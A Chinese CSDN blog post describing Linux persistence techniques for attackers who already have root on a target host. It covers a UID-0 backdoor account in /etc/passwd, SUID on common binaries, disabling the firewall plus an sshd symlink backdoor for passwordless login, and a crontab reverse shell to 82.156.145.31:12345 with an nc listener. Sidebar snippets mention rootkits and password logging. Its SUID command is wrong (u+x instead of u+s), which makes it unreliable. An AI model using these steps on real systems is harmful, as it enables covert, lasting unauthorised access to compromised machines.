LINUX权限维持

最新推荐文章于 2024-02-17 08:00:00 发布
最新推荐文章于 2024-02-17 08:00:00 发布
阅读量613 收藏
点赞数
分类专栏: 权限维持 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65096687/article/details/131323567
版权

1.添加超级用户

添加超级用户的方式有很多种,这里直接拿到root权限后创建一个用户,在/etc/passwd/中修改用户id值为0。

vim /etc/passwd

2.设置文件SUID权限

Linux提权操作中有个suid提权。在对方主机中查看是否又以下文件·

  • Nmap
  • Vim
  • find
  • Bash
  • More
  • Less
  • Nano
  • cp  

把这些文件加上SUID

chmod u+x 文件

然后就可以利用suid提权来权限维持。

3.ssh软链接

拿到对方的root权限后,关闭防火墙。

建立软链接

ln -sf /usr/sbin/sshd /路径名/su; /路径名/su -oPort=端口号

就可以免密登录。

4.crontab 计划任务反弹shell

得到对方主机权限后,在目录中写入命令执行脚本

bash -i >& /dev/tcp/82.156.145.31/12345  0>&1

然后在计划任务中配置

第一个星号是分钟,这里没有加就是过一会就执行。

然后攻击机开启nc监听

nc -lvvp 12345

不过是三年五载
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux权限维持
小丁长不胖
07-22 241
一:适配方法 1:后门账户 可疑用户排查: 2:SUID Shell Suid shell是一种可用于以拥有者权限运行的shell。 可疑排查: 3:公私钥免密登录 在客户端上生成一对公私钥,然后把公钥放到服务器上(~/.ssh/authorized_keys),保留私钥。当ssh登录时,ssh程序会发送私钥去和服务器上的公钥做匹配。如果匹配成功就可以登录了。 客户端与服务端执行: ssh-keygen -t rsa #过程中按三次回车 其中 id_rsa为私钥,id_rsa.pub为公钥,接
linux权限维持
最新发布
weixin_45653478的博客
03-28 914
在过去,我们想要对一个使用者进行认证 (authentication),得要要求用户输入账号口令, 然后透过自行撰写的程序来判断该账号口令是否正确。也因为如此,我们常常得使用不同的机制来判断账号口令,所以搞的一部主机上面拥有多个各别的认证系统,也造成账号口令可能不同步的验证问题!为了解决这个问题因此有了 PAM (Pluggable Authentication Modules, 嵌入式模块) 的机制!
Linux权限维持方法论
大河之犬的博客
06-19 557
Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆,特点是配置简单并可以自定义验证密码和端口号。通过命令替换动态跟踪系统调用和数据,可以用来记录用户ssh、su、sudo的操作。strace不只是可以监听连接他人,还可以用来抓到别人连入的密码。此时我们任何使用ssh登录或者切换用户的操作,密码都会被记录到。文件中,这种方法的缺点是生成的log文件特别大,且容易引起怀疑。其中111111为你连接后门程序时的密码,7777为连接的端口。会获取一个root的shell。
Linux权限维持(六)
pingan233的博客
02-25 298
# “2”在linux中代表错误输出,“1”在linux中代表标准输出,在此处也就是nohup的输出。#mount --bind命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个目录的访问,并且会将前一个目录路径隐藏起来(注意这里只是隐藏不是删除,数据未发生改变,仅仅是无法访问了)。一般来说我们是做一个正向连接后门,因为反向后门的代码里面没有循环,并不能进行长时间的连接。其中,恶意脚本 dir.py 的内容可以是任何功能的后门,比如上面的监听本地11端口。
linux权限维持.pdf
03-31
linux权限维持.pdf
[总结]Linux权限维持1
08-03
1.[总结]SQL注总结 3.[后渗透]多姿势绕过 Powershell 调保护 5.[总结]加载 DLL 的多种式 7.[逆向]PE件格式解析 3. [WEB
linux suid权限维持速查表1
08-03
linux suid权限维持速查表linux suid 权限维持速查表赋权姿势:linux suid权限维持速查表linux suid权限维持速查表linux
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
Linux内网渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
在MySQL中用root用户创建新的用户并为之授予权限
热门推荐
江南好
04-06 1万+
前言 在一个正常发展的公司里面都会进行着明显的数据权限管理,特别是操作数据库这种安全性要求比较高的软件时。毕竟,万一你误删了某些数据库,损失就大了。为此,在公司里进行项目开发时,一般会一个项目就创建一个专门的用户指定其权限只能控制某一个数据库进行操作。这样在开发项目的过程中,就只能用该用户操作指定的数据库,而无法影响到其他的数据库了,无疑,这种做法提高了数据操作的安全性。 创建用户 要创建一个新的mysql用户的话,需要用root用户登录MySQL服务器并进行操作。 首先登录mysql客户端:mysql -
Linux系统权限维持
m0_56109788的博客
11-08 74
如果蓝队根据文件修改时间来判断文件是否为后门,如参考index.php的时间再来看shell.php的时间就可以判断shell.php的生成时间有问题解决方法:touch -r index.php shell.php#将文件shell.php的时间修改为和index.php相同,如果shell.php文件不存在,就创建shell.php文件touch命令用于修改文件或目录的时间属性,包括存取时间和更改时间。若文件不存在,系统会建立一个新的文件。
Linux维持权限实验
soldi_er的博客
04-20 350
文章目录实战1 实战1   使用find命令,确定目标机器没有apache/nginx服务器、编程环境php。   使用Nmap扫描80, 443, 5678端口,发现只有已知的5678端口开放。   在/jd目录下看到authorized_keys文件 ...
持久化:Linux利用SUID、任务计划、vim进行权限维持
qq_68163788的博客
02-17 1076
以利用SUID(Set User ID)权限来实现权限维持。通过设置SUID权限,用户可以以文件所有者的身份执行该文件,从而获取文件所有者的权限。这样可以帮助攻击者在系统中保持持久权限。另外,任务计划(Cron Jobs)也是一种常见的权限维持方法。攻击者可以通过创建定时任务,定期执行恶意脚本或程序来维持权限。此外,vim编辑器也可以被用来进行权限维持。攻击者可以利用vim编辑器的漏洞来提升自己的权限或执行恶意代码。
Linux权限维持有哪些方法
04-29
Linux权限维持的方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值